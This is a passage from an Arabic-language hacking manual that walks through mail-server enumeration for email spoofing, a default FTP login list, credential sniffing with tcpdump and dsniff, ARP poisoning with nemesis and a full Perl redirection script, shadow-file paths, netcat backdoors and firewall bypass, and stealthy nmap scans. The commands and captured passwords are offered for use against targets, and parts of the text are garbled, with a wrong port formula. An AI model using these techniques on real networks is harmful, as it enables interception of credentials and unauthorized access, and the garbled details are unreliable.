٢١٢٫١٦٦٫٢٦ بعد ماتعرفنا على نوع خادمهم سنبدأ بطباعة الامر >Set q=xm >crystal.com Server: DNS.saudi.net Address: ٢١٢٫١٦٦٫٢٦ crystal.com MX preference = ٥, mail exchanger = mail.crystal.com crystal.com MX preference = ١٠, mail exchanger = mx٢.crystal.com crystal.com MX preference = ٢٠, mail exchanger = mx٣.crystal.com crystal.com nameserver = ns.crystal.com crystal.com nameserver = ns-١.crystal.com crystal.com nameserver = ns-٢.crystal.com crystal.com nameserver = ns-٣. crystal.com crystal.com nameserver = ns-٤. crystal.com mail. crystal.com internet address = ٢١٢٫١٦٦٫٢٦ mx٢. crystal.com internet address = ٢١٢٫١٦٦٫٢٦ mx٣. crystal internet address = ٢١٢٫١٦٦٫٢٦ ٥٠ ns. crystal.com internet address = ٢١٢٫١٦٦٫٢٦ ns. crystal.com internet address = ٢١٢٫١٦٦٫٢٦ ns. crystal.com internet address = ٢١٢٫١٢٤٫٠٫٢٥٤ ns. crystal.com internet address = ٢١٢٫١٢٤٫١٫٢٥٤ ns. crystal.com internet address = ٢١٩٫٩٨٫٣٢٫٥٤ ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٣٢ ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٣٠ ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٢٥ ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫١٥ ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٢١ ns. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٩ ns-١. crystal.com internet address = ٢١٦٫١٢٤٫٢٦٫٢٥٤ ns-٢. crystal.com internet address = ٢١٩٫٩٨٫٣٢٫٥٤ ns-٣. crystal.com internet address = ٢١٦٫١٢٤٫١٫٢٥٤ ns-٤. crystal.com internet address = ٢١٦٫١٢٤٫٠٫٢٥٤ > السطور التى اخبرتك ماهي الحسابات ستتيح لك القيام بتزوير بريد الكتروني مثلا crystal الى الناس مع الموقع المستهدف وليكون واحيانا عندما تسئل عن خادم بريد ستعطيك اداة البحث هذا النوع من رسالة الخطأ DNS request timed out. timeout was ٢ seconds. DNS request timed out. timeout was ٢ seconds. عدها تمكثل المشكة في الهويز ٥١ والان علمت مدى خطورة الانترنت وانه ليس امانًا بشكل صحيح وبأمكان اي شخص التجسس على بريدك الالكتروني وبسهولة بأمكانه حذف مايريد من بريدك بأستخداام التلينت ورأيت انت ماذا استخرج لك من معلومات وبأمكانك تطبيقها على بريدك الالكتروني مع وضع الخادم المستضيف لبريدك لتأكد من صحة كلامي وسأبتعد في كتابي هذا عن الاوامر الخطيره ذا الموضوع وسأتركها بالجزء الثاني من كتاب القرصنة تحت اهر وتقريبا انتهينا من اهم النقاط ذا الجزء ولكن لن نبتعد عن دوس في مواضيعنا التاليه ٥٢ الفصل الثالث ٣ ٥٣ وهنا سنشرح الطرق الذكيه FTP سبق وتكلمنا عن بروتوكول ال لإستغلال هذا البروتوكول في التسلل الى الانظمة والدخول أعتبر هذا الجزء من الاجزاء المحضوره في كتابي ولكن لزيادة معلومات القارئ العزيز أحببت ان اتوسع ذا الجزء في الدخول الى الانظمة . كما تعلمنا كيفية الدخول إلى الخدمة عن طريق التلينت او حتى الشيل او الدوس ولكن افضل التلينت على بقية البرامج الاخرى . اذهب لشاشة التلينت المراد الدخول إلية ولتكون شبكتك الخاصه ip قم بوضع رقم ال Host name : ١٢٧,٠,٠,١ Port : ٢١ رياضيات الاف تي بي % - ÷ × + ٥٤ ضع رقم الاي بي المراد الدخول إليه والبورت يكون بورت الخدمه وهو ال ٢١ بعد مايتم التحقق من إتصالك ستظهر لك شاشة تطلب كلمة المرور واسم المستخدم الخاص بالشبكة او الموقع.... الخ قم بوضع اسم المستخدم وكلمة المرور اذا كانت شبكتك او ضع احد الاسماء التى ستظهر لك بالجدول ٥٥ كلمة المرور اسم المستخدم root root nobody anon informix database fld / test / support field qadmin adm / admin daemon daemon admin admin install install anon anon ncrm ncr net netowrk netman net / man / mgr nuucp anon anon [email protected] games games guest guest daemon daemon sysmaint / service main manager mgr / man lib library / syslib ٥٦ ingres database تقريبا هذه كلمات المرور واسماء المستخدمين المتعارف عليها في خدمة الاف تي بي . بعد ماقمت بالدخول للسيرفر او الشبكة اذا ظهرت هذه الرسالة لديك بشاشة التلينت Logged in super-crystaL الاسم الذي ادخلته =Super-CrystaL ☺ فتأكد انك اتصلت بالشبكة او الخادم والان قم بتنفيذ هذا الامر بعد إتصالك بالخادم Pasv سيرد عليك الخادم ذا المعلومات Entring Passive Mode ١٢٧،٠،٠،١،١٤،٤٨ ١٢٧,٠,٠,١ = عنوان رقم الاي بي للخادم ip ومعروف انه عنوان بروتوكول انترنت ولكن ماهو الذي باللون الازرق؟ ١٤,٤٨ = هذا هو منفذ الخادم او الشبكة المفتوح ولكن جميعنا يعرف ان المنفذ غالبا مايستخدم رقم واحد وليس رقمين في خانتين اذن ؟ الخادم الذي نريد المحاولة لدخولة قسم لنا المنفذ بمسألة حسابية سداسي ٥٧ عشري اذن هذا لن يفيدنا في التحقق من المنفذ المفتوح بالخادم !! يوجد طريقة واحدة يستخدمها فقط المخترق العبقري في تحليل المنفذ المفتوح وهي ٢٥٥ × ان تقوم بضرب العدد الاول في الخانة الاولى ١٤ لماذا ضربنا العدد في ٢٥٥ لإن هذا العدد هو آخر عدد يصله رقم الاي بي وبعد ذالك يبدأ من الصفر وتبدأ سلسلة جديدة من ارقام الإي بي كما تعلمنا في جزء بروتكول الإنترنت ٢٥٥ سيخرج لنا الناتج هو ٣٧١٠ × بعد ماقمنا بضرب العدد ١٤ ٣٧٥٨= ٣٧١٠+ الان قم بعملية جمع للعدد ٤٨ ٣٧٥٨ هذا هو رقم المنفذ المفتوح بالخادم اذن ماذا تنتظر ........قم بمعاودة الاتصال بالاف تي بي ولكن ضع البورت ٣٧٥٨ المفتوح بالخادم واطلب الاتصال وسترى ،،،، ٥٨ كثر الحديث حول اداة السنايفر في مواقعنا العربية ولكن للاسف لم يكن الشرح تطبيقي على الخوادم وهذا على ماأعتقد قلة خبرم في اداة سنايفر التي تعمل على سطر اوامر واغلبهم شرحها على الواجهة الرسومية بنظام لينوكس.. ولكن هذا لايفيدك اذا اردت استغلالها بالاختراق ويجب ان تكون لديك خبره بادوات السنايفر التى تعمل على سطر اوامر في الشيل وهذا ماسنفعله حاليا .. يوجد الكثير من الادوات التى تعمل على سطر اوامر ولكن افضل لك أن TcpDump تستخدم اداة ال وقم بتحميلها من موقعها الرئيسي /http://www.tcpdump.org sNiffing ٥٩ اولا قم بسحب الاداة من موقعها عبر الشيل ذا الامر wget http://www.tcpdump.org/release/tcpdump-٣٫٧٫٢.tar.gz واذا اردت تثبيت الاداة كل ماعليك فعله هو كتابة هذا الاوامر بالشيل ./configure + Make + make install ☺ والآن نقوم بتطبيق الاوامر عبر الشيل على السيرفر لتحليل لإظهار النتائج واهم شئ فعله قبل ان تبدا بالتوسع بالموضوع هو ان تعلم انه يجب ان تكون روت على السيرفر حتى تستطيع تطبيق الاوامر ***** انطلقت لحظة الصفر **** سنبدأ بكتابة الامر Ifconfig هذا الامر هو نفسه امر Ipconfig بنظام ويندوز والاختلاف بسيط في كتابتة في كلا النظامين وهو حرف P ٦٠ بعد ماقمنا بكتابة الامر بشاشة الشيل استخرج لنا المعلومات كالموضح بالصورة رقم ( ١) .... قم بكتابة الاوامر مثل ماهي موضح لك ببقية الصورة # ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:9 Base address:0xc000 collisions:0 txqueuelen:100 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:9 Base address:0xc000 ( الصورة رقم ( ٢ # ifconfig eth0 ٦١ eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED # ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED BROADCAST PROMISC MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:9 Base address:0xc000 # والان سنقوم بتوجية امر tcpdump -l -X 'ip host 69.165.0.166 69.165.0.166 =قم بتغييره للعنوان المراد فحصه # tcpdump -l -X 'ip host 69.165.0.166' ٦٢ tcpdump: listening on eth0 21:27:44.684964 69.165.0.166.ftp > 69.165.0.193.32778: P 1:42(41) ack 1 win 17316 <nop,nop,timestamp 466808 920202> (DF) 0x0000 4500 005d e065 4000 8006 97ad c0a8 0076 E..][email protected] 0x0010 c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8 ........)..s^... 0x0020 8018 43a4 a12f 0000 0101 080a 0007 1f78 ..C../.........x 0x0030 000e 0a8a 3232 3020 5459 5053 6f66 7420 ....220.TYPSoft. 0x0040 4654 5020 5365 7276 6572 2030 2e39 392e FTP.Server.0.99. 0x0050 3133 13 21:27:44.685132 69.165.0.193.32778 > 69.165.166.ftp: . ack 42 win 5840 <nop,nop,timestamp 920662 466808> (DF) [tos 0x10] 0x0000 4510 0034 966f 4000 4006 21bd c0a8 00c1 E..4.o@.@.!..... 0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c ...v....^...)... 0x0020 8010 16d0 81db 0000 0101 080a 000e 0c56 ...............V 0x0030 0007 1f78 ...x 21:27:52.406177 69.165.0.193.32778 > 69.165.0.166.ftp: P 1:13(12) ack 42 win 5840 <nop,nop,timestamp 921434 466808> (DF) [tos 0x10] 0x0000 4510 0040 9670 4000 4006 21b0 c0a8 00c1 [email protected]@.@.!..... 0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c ...v....^...)... 0x0020 8018 16d0 edd9 0000 0101 080a 000e 0f5a ...............Z 0x0030 0007 1f78 5553 4552 206c 6565 6368 0d0a ...xUSER.super.. 21:27:52.415487 69.165.0.166.ftp > 192.168.0.193.32778: P 42:76(34) ack 13 win 17304 <nop,nop,timestamp 466885 921434> (DF) 0x0000 4500 0056 e0ac 4000 8006 976d c0a8 0076 [email protected] 0x0010 c0a8 00c1 0015 800a 292e 8a9c 5ed4 9cf4 ٦٣ ........)...^... 0x0020 8018 4398 4e2c 0000 0101 080a 0007 1fc5 ..C.N,.......... 0x0030 000e 0f5a 3333 3120 5061 7373 776f 7264 ...Z331.Password 0x0040 2072 6571 7569 7265 6420 666f 7220 6c65 .required.for.le 0x0050 6563 ec 21:27:52.415832 192.168.0.193.32778 > 192.168.0.118.ftp: . ack 76 win 5840 <nop,nop,timestamp 921435 466885> (DF) [tos 0x10] 0x0000 4510 0034 9671 4000 4006 21bb c0a8 00c1 E..4.q@.@.!..... 0x0010 c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe ...v....^...)... 0x0020 8010 16d0 7e5b 0000 0101 080a 000e 0f5b ....~[.........[ 0x0030 0007 1fc5 .... 21:27:56.155458 192.168.0.193.32778 > 192.168.0.118.ftp: P 13:27(14) ack 76 win 5840 <nop,nop,timestamp 921809 466885> (DF) [tos 0x10] 0x0000 4510 0042 9672 4000 4006 21ac c0a8 00c1 E..B.r@.@.!..... 0x0010 c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe ...v....^...)... 0x0020 8018 16d0 90b5 0000 0101 080a 000e 10d1 ................ 0x0030 0007 1fc5 5041 5353 206c 3840 6e69 7465 ....PASS.l8@crystal 0x0040 0d0a .. 21:27:56.179427 69.165.0.166.ftp > 192.168.0.193.32778: P 76:103(27) ack 27 win 17290 <nop,nop,timestamp 466923 921809> (DF) 0x0000 4500 004f e0cc 4000 8006 9754 c0a8 0076 [email protected] 0x0010 c0a8 00c1 0015 800a 292e 8abe 5ed4 9d02 ........)...^... 0x0020 8018 438a 4c8c 0000 0101 080a 0007 1feb ..C.L........... 0x0030 000e 10d1 3233 3020 5573 6572 206c 6565 ....230.User.lee 0x0040 6368 206c 6f67 6765 6420 696e 2e0d 0a ٦٤ لن تفهم بعض هذه المعلومات ويجب ان تستخدم محلل للبروتوكولات حتى ASCII يقوم بتحويلها الى صيغة ولكن حتى لايكون شرحها به شئ من الغموض سأشرح لك . استخرج لنا الامر السابق جميع المعلومات حول خدمه الاف تي بي والتلينت للسيرفر الذي وضعنا عنوانه Pop وال ٣ لاتتلخبط اسلاك عقلك وتقول لي المعلومات ستكون مشفره فجميع اتصالات الاف تي بي لاتكون ابدا مشفره وستمتع ناظرك بما ترى بدون المراجعة لبرامج كراك وحتى اثبت لك صحة الكلام نفذ الامر التالي لاستخراج كلمة المرور واسم المستخدم الصحيحة # dsniff -n dsniff: listening on eth0 ----------------- 12/10/02 21:43:21 tcp 69.165.0.193.32782 -> 192.168.0.118.21 USER super PASS l8@crystal ----------------- 12/10/02 21:47:49 tcp 69.165.0.193.32785 -> 192.168.0.120.23 (telnet) USER root PASS rOxRay استخرجنا يوزوباسوورد الاف تي بي والتلينت ايضا ٦٥ ولو كنت مدقق لكان اتضح لك انه عرض اليوزنيم والباسوورد قبل كتابتنا ☺ للامر وهي بالصورة السابقه ------------------ وهذا بعد ماقمنا بعمليه هجوم على الشبكة بالامر dsniff . انتهينا من الخطوة الاولى وسنتوجه للخطوه الثانيه قم باارسال بينج عبر هذا الامر وانظر ٦٦ # ping -c 1 -w 1 69.165.0.1 PING 69.165.0.1 (69.165.0.1): 56 octets data 64 octets from 69.165.0.1: icmp_seq=0 ttl=64 time=0.4 ms --- 69.165.0.1 ping statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.4/0.4/0.4 ms # ping -c 1 -w 1 69.165.0.166 PING 69.165.0.166 (69.165.0.166): 56 octets data 64 octets from 69.165.0.166: icmp_seq=0 ttl=128 time=0.4 ms --- 69.165.0.166 ping statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.4/0.4/0.4 ms # arp -na ? (69.165.0.166) at 00:50:18:00:0F:01 [ether] on eth0 ? (69.165.0.166) at 00:C0:F0:79:3D:30 [ether] on eth0 # ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED inet addr:192.168.0.193 Bcast:69.165.0.255 Mask:255.255.255.0 UP BROADCAST NOTRAILERS RUNNING MTU:1500 Metric:1 RX packets:4153 errors:0 dropped:0 overruns:0 frame:0 TX packets:3875 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:601686 (587.5 Kb) TX bytes:288567 (281.8 Kb) Interrupt:9 Base address:0xc000 # جميل جدا استخرجنا معلومات كاملة حول الماك الرئيسي وهذا ماظهر لنا بالصورة والان قم بتنفيذ هذا الامر ٦٧ # nemesis NEMESIS -=- The NEMESIS Project Version 1.4beta3 (Build 22) NEMESIS Usage: nemesis [mode] [options] NEMESIS modes: arp dns ethernet icmp igmp ip ospf (currently non-functional) rip tcp udp NEMESIS options: To display options, specify a mode with the option "help". # nemesis arp help ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4beta3 (Build 22) ARP/RARP Usage: arp [-v (verbose)] [options] ARP/RARP Options: -S <Source IP address> -D <Destination IP address> -h <Sender MAC address within ARP frame> -m <Target MAC address within ARP frame> -s <Solaris style ARP requests with target hardware addess set to broadcast> -r ({ARP,RARP} REPLY enable) -R (RARP enable) -P <Payload file> Data Link Options: ٦٨ -d <Ethernet device name> -H <Source MAC address> -M <Destination MAC address> You must define a Source and Destination IP address. # # nemesis arp -v -r -d eth0 -S 69.165.0.1-D 69.165.0.166 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M 00:C0:F0:79:3D:30 ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4beta3 (Build 22) [MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30 [Ethernet type] ARP (0x0806) [Protocol addr:IP] 69.165.0.1> 69.165.0.166 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30 [ARP opcode] Reply [ARP hardware fmt] Ethernet (1) [ARP proto format] IP (0x0800) [ARP protocol len] 6 [ARP hardware len] 4 Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB. ARP Packet Injected # nemesis arp -v -r -d eth0 -S 69.165.0.166 -D 69.165.0.1-h 00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M 00:50:18:00:0F:01 ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4beta3 (Build 22) [MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01 [Ethernet type] ARP (0x0806) [Protocol addr:IP] 69.165.0.166> 69.165.0.1 ٦٩ [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01 [ARP opcode] Reply [ARP hardware fmt] Ethernet (1) [ARP proto format] IP (0x0800) [ARP protocol len] 6 [ARP hardware len] 4 Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB. ARP Packet Injected # their MAC address is at the attacker's loooooooooooooooool # perl -e 'while(1){print "Redirecting...\n"; system("nemesis arp -v -r -d eth0 -S 192.168.0.1 -D 192.168.0.118 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M 00:C0:F0:79:3D:30"); system("nemesis arp -v -r -d eth0 -S 192.168.0.118 -D 192.168.0.1 -h 00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M 00:50:18:00:0F:01");sleep 10;}' Redirecting... Redirecting... ☺ هكذا تستغل اختراقك ياغلام والان النقطه التاليه لكي تنجح ٧٠ #!/usr/bin/perl $device = "eth0"; $SIG{INT} = \&cleanup; # Trap for Ctrl-C, and send to cleanup $flag = 1; $gw = shift; # First command line arg $targ = shift; # Second command line arg if (($gw . "." . $targ) !~ /^([0-9]{1,3}\.){7}[0- 9]{1,3}$/) { # Perform input validation; if bad, exit. die("Usage: arpredirect.pl <gateway> <target>\n"); } # Quickly ping each target to put the MAC addresses in cache print "Pinging $gw and $targ to retrieve MAC addresses...\n"; system("ping -q -c 1 -w 1 $gw > /dev/null"); system("ping -q -c 1 -w 1 $targ > /dev/null"); # Pull those addresses from the arp cache print "Retrieving MAC addresses from arp cache...\n"; $gw_mac = qx[/sbin/arp -na $gw]; $gw_mac = substr($gw_mac, index($gw_mac, ":")-2, 17); $targ_mac = qx[/sbin/arp -na $targ]; $targ_mac = substr($targ_mac, index($targ_mac, ":")-2, 17); # If they're not both there, exit. if($gw_mac !~ /^([A-F0-9]{2}\{5}[A-F0-9]{2}$/) { die("MAC address of $gw not found.\n"); } if($targ_mac !~ /^([A-F0-9]{2}\{5}[A-F0-9]{2}$/) { die("MAC address of $targ not found.\n"); } # Get your IP and MAC print "Retrieving your IP and MAC info from ifconfig...\n"; ٧١ @ifconf = split(" ", qx[/sbin/ifconfig $device]); $me = substr(@ifconf[6], 5); $me_mac = @ifconf[4]; print "[*] Gateway: $gw is at $gw_mac\n"; print "[*] Target: $targ is at $targ_mac\n"; print "[*] You: $me is at $me_mac\n"; while($flag) { # Continue poisoning until ctrl-C print "Redirecting: $gw -> $me_mac <- $targ"; system("nemesis arp -r -d $device -S $gw -D $targ -h $me_mac -m $targ_mac -H $me_mac -M $targ_mac"); system("nemesis arp -r -d $device -S $targ -D $gw -h $me_mac -m $gw_mac -H $me_mac -M $gw_mac"); sleep 10; } sub cleanup { # Put things back to normal $flag = 0; print "Ctrl-C caught, exiting cleanly.\nPutting arp caches back to normal."; system("nemesis arp -r -d $device -S $gw -D $targ -h $gw_mac -m $targ_mac -H $gw_mac -M $targ_mac"); system("nemesis arp -r -d $device -S $targ -D $gw -h $targ_mac -m $gw_mac -H $targ_mac -M $gw_mac"); } # ./arpredirect.pl Usage: arpredirect.pl <gateway> <target> # ./arpredirect.pl 69.165.0.1 69.165.0.166 Pinging 69.165.0.1 and 69.165.0.166 to retrieve MAC addresses... Retrieving MAC addresses from arp cache... Retrieving your IP and MAC info from ifconfig...[*] Gateway: 69.165.0.1 is at 00:50:18:00:0F:01[*] Target: 69.165.0.166 is at 00:C0:F0:79:3D:30[*] You: 69.165.0.193 is at 00:00:AD:D1:C7:ED Redirecting: 192.165.0.1 -> 00:00:AD:D1:C7:ED <- 69.165.0.166 ARP Packet Injected ٧٢ ARP Packet Injected Redirecting: 69.165.0.1-> 00:00:AD:D1:C7:ED <- 69.165.0.166 ARP Packet Injected ARP Packet Injected Ctrl-C caught, exiting cleanly. Putting arp caches back to normal. ARP Packet Injected ARP Packet Injected # وتقريبا انتهينا من الشرح الموجز لااداة السنايفر ٧٣ اغلب المخترقين يصعب عليه استخراج ملف كلمات المرور الاصلي والذي بالانظمة x يحصل به على كلمات المرور مشفره وليست مظلله بعلامة فالكل نظام مسار به كلمات مرور وحسابات المستخدمين الموجودين بالخادم وهنا سأشرح جميع الانظمة ومسارات حسابات المستخدمين بالجدول ادناه مسارات ملفات المستخدمين بالانظمة ٧٤ ملف كلمات المرور النظام Linux etc/shadow/ Digital UNIX etc/tcb/aa/user/ AIX etc/security/passwd/ ConvexOS ١٠ etc/shadpw ConvexOS ١١ etc/shadow/ BSD ٤,٣ etc/master.passwd/ HP-UX secure/etc/passwd./ IRIX ٥ etc/shadow/ UNICOS etc/udb/ SunOS etc/shadow/ System V r٤,٠ etc/shadow/ قم بكتابة الامر بموجة الشيل وستجد جميع حسابات المستخدمين بكلمات مرورهم مشفره اما طريقة فك تشفيرها لن اشرحها بكتابي فهي تعتمد على برامج كراك مثل جون ذا ريبر وجاك ذا ريبر . الهدف من وضع الجزء هذا فقط لزيادة معلومات ولن اشرح أي نقطه اعتبرها للتخريب ........... ٧٥ هذا الجزء قد شاركني به اخى صانع السلالم النائب العام لفريقي السابق وهذا ليس لقلة خبرتى بمجال الادوات ولكن بما انه قام بكتابة هذا الدروس للفريق سابقا ولم تنتشر أحببت ان اضعها هنا الادوات الإحترافية ٧٦ الكاتب: صانع السلالم اوامر النت كات netcat سوف يتم استخدام افضل الاوامر لي الاداة # كيفية عمل مسح على موقع nc –v –z ١٩٢,١٦٨,١,٩٠ ١- يتم بواسطة ٢٠٠ اما في حال وجود نظام كشف الدخلاء سوف اقوم بجعل عملية المسح اكثر سريه حيث ستكون عملية المسح اكثر عشوائيه مما يساعد في اخفاء العمليه ولا يجعها تبدو كعملية مسح الامر nc -v -z -r -i ٤٢ target ٢٠-٨٠ امر التعرف على الخدمات يعني عملية رفع البصمات للبرامج nc -v target الامر ٢١ ٢٢ ٨٠ فا احد upd يقبل رزم syslog *في حال انا اذا اردنا معرفت ان الطرق لي الكشف عن هذا الشي هو الامر #echo "<٠> rait any maissg "l ./nc -u target (port) * طريقة الالتفاف حول الجدران الناريه حيث بعض الجدران الناريه تسمح في المرور والخروج فيمكننا الاستفاده منه حيث الامر dns بمرور رزم ٧٧ تستطيع ان تتخطى المرشح الذي nc -p ٥٣ targthost ٩٨٩٨ aol instant messenger يصد عاده مرور كيفية جعل النت كات تعمل كا باك دور طبعا يجب علينا رفع النت كات للسيفر واما بالنسبه لكيفية جعلها تعمل كاباك دور ننفذ هذا الامر nc -L -p ١٠٠٠١ اما من ناحية الاتصال في هذا البورت والتحكم فيه نكتب هذا الامر nc –v –n ip the host بالامر ١٠٠٠١ طبعا الرقم اقصد العدد ١٠٠٠١ هو رقم المنفذ إلي راح ندخل او البوابه لنا يحق لنا تغييرها لي أي شي *في حال نريد النت كات ان نجعلها كا الافتبي اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر : nc –l – ونبغي نسحبه , بنطبق هذا الامر hack.txt , ملف اسمه p ١٢٣٤ >hack.txt ١٢٣٤ هذا هو البورت الي بنستخدمه في سحب الملف. انزين , واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟ عن طريق هذا الامر ٧٨ : nc ١٩٢,١٦٨,١,٩٠ ١٢٣٤ <hack.txt , ^C * طبعا في حال رفعنا ملف للسيرفر ونبي نشغله نكتب الامر وعلشان نشغل الملف في السيرفر , نستخدم الامر , ! hack.txt! ٧٩ Nmap شرح اداة ال الكاتب: صانع السلالم بسم الله الرحمن الرحيم الحمدالله والصلاة والسلام على اشرف الانبياء والمرسلين اقدم لكم اخواني بمناسبة صدور كتاب القراصنة تحت اهر هديه متواضعه مني للاخ كرستال Nmap تعتبر من اقوى الماسحات انتشارا وذالك لانه يسهل تحميلها Nmap الاداه وتثبيتها بسرعه وكما لقوا في اكتشاف المنافذ المفتوحه . واا تستخدم كابورت سكان ناتي Nmap بعد معرفتنا في وظيفية الاداة لي لكيفية استخدمها بطريقه صحيحه والاستفاده منها بإكبر قدر ممكن اوامر هذه الاداه الرائعه : nmap -sT www.targthost.com ١- الامر يقوم هذا الامر بي اتصال تام مع الموقع ويجري معه مصافحه ثلاثيه ويتم كشف عمليتك اذا قمت بعمل سكان على الموقع ويسجل رقم الايبي مالك ☺ في ملفات اللوق وهذا الشي احنا مانبيه طبعا ٨٠ وظيفته: nmap -sR www.targthost.com ٢- الامر ويحدد هذه RPC يقوم هذا الامر بي مسح كافة المنافذ المفتوحه لخدمات او لا وتحدد وتكشف انواع RPC المنافذ هل هي عباره عن خدمات سوف اعطيكم RPC AND MOUNTD وارقام النسخ للخدمات مثال على خرج الامر هذا انظر ١١١/tcp open SUNRPC(RPCBIND V٢) RPC عرفنا بواسطة الامر هذا نوع ونسخة مصمم هذا nmap -sS www.targthost.com ٣- الامر الامر لي اختراق الجدارن الناريه يحيث وظيفة هذا الامر يقوم بتحديد البورت المحمي بجدار ناري او مسوي عملية فلتره للبورت مثال ١٣٥/tcp filtered nmap -O www.targthost.com ٤- الامر وظيفة هذا الامر يقوم بي التكهن في معرفة النظام ونوعه هل هو لنكس او يونكس ....إلخ مثال system guess: Linux Kernel ٢,٤,٠ - ٢,٥,٢٠ nmap -v www.targthost.com ٥- الامر وظيفة :هذا الامر يجعلك تتعرف على الخدمات فثلا وهكذا مع (send mail) وبورت ٢٥ ( ftp بورت ٢١ (طبعا بورت باقي البورتات مثال 21/tcp open ftp ٨١ 22/tcp open ssh 25/tcp open smtp وظيفة الامر : nmap -l www.targthost.com ٦- الامر التي تتصنت على بورت IDENTD اذا كان المستضاف البعيد يشغل اداة ١١٣ بشكل افتراضي تخبرنا هذي الاداة في التعرف على الملقمات المشغله كجذر مثال توضيحي : 21/tcp open root 80/tcp open nobody 22/tcp open root nmap -T Sneaky -sS - targthost.com ٧- الامر وظيفة الامر : تقوم بمساعدتك على اخفاء المسح عن الجدران الناريه و انظمة التي تعتمد على الوقت لكي تكشف عمليات المسح وتميزها IDS الكشف عن غيرها يقوم بتحديد المده الزمنيه T حيث الامر nmap -F targthost.com ٨- الامر Ss-Sf-) وضيفة الامر : يقوم الامر بي اجراء بعض عمليات المسح المتسللة ويجعلها قادره على التسلل على الجران الناريه وانظمة كشف (sX-Sn الدخلاء ولكنه خطير في عمله حيث يقوم بتحطيم الانظمه وقد لا يعمل بشكل صحيح في بعض انظمة لنكس ٨٢ ويستخدم الامر هذا في حال انا اردنا نفحص أي موقع فانه Po ٩- امر يقوم بي فحصه مباشره ويتقضى عن ارسال بنج للموقع او الايبي لي يتاكد من نشاطه ويستخدم غالبا الامر هذا في حال ان بعض المواقع تفسر رزم البنج باا حجوم على السيرفر فتمنعها عنه (whois) شرح الاداه الكاتب: صانع السلالم ٨٣ اداه بسيطه جدا وموفيده بنفس الوقت في اجراء whois تعتبر الاداه استعلام عن عنوان ايبي او عنوان سيرفر ننتقل إلي عملية كيفية تحديد سيرفرات الاداه والاستفاده منها باكبر قدر ممكن انظر الجدول الملقم الهدف الهدف يعتبر هذا الملقم الافتراضي لي Whois.internic.net وهو يتعتبر نقطة whois اداة البدايه هذا الملقم للزبائنالذين سجلوا Whois.networksolutions.com اسماء ميادينهم باستخدام حلول الشبكه يقوم هذا الامر جلب معلومات Whois.arin.net ip عن أي whois ملقم قاعدة بيانات Whois.apnic.net لمركز معلومات شبكات الباسيفيك الاسويه حكومي whois ملقم Whois.nic.gov جلب معلومات عن الاميل Whois.nic.mail فمثلا يجينا الحين واحد يقول ابي استفيد طيب من الشرح انا اقوله كيف يستفيد من الشرح راح اشرح ثلاث امثله ٨٤ المثال الاول طيب انا الحين عندي عنوان موقع او ايبي ابي معلومات عنه بدون الحاجه إلي نقوله طبق الامر هذا whois أي ملقم او سيرفر من سيرفرات Whois ١٢٧,٠,٠,١ وراح الاداه تطبق الملقم او السيرفر الافتراضي لها Whois.internic.net إلأي هو المثال الثاني طيب انا ابي معلومات عن موقع حكومي اسمه www.hostnema.gov في جلب المعلومات عن الدومين هذا whois اوكي راح نستعين في سيرفر www.hostnema.govWhois –h Whois.nic.gov المثال الثالث : طيب يجيناا واحد ويوقل مثلا انا عندي اميل وابي معلومات عنه نقوله الاداه هذا توفر لنا المعلومات عن هذا الاميل مثال Whois –h Whois.nic.mail al_fttak٩١١@hotmail.com وبكذا انتهينا من شرح الاداه ومع عرض جميع ملقماا او سيرفراا واصبحنا قادرين على جلب المعلومات عن أي شي نريد مع تحيات اخوكم / صانع السلالم (hacker the help) ٨٥ ipeye اداة الكاتب: صانع السلالم مقدمه : الاداه هذي تعتبر من ادوات السكيورتي المخصص للعمل في بيئة الوندوز الوظيفية :هي عباره عن اداه تقوم في مسح البورتات سواء للجهزه او المواقع (بورت سكان) يعني شبيه فيها nmap المميزات : تتميز هذه الاداه بي 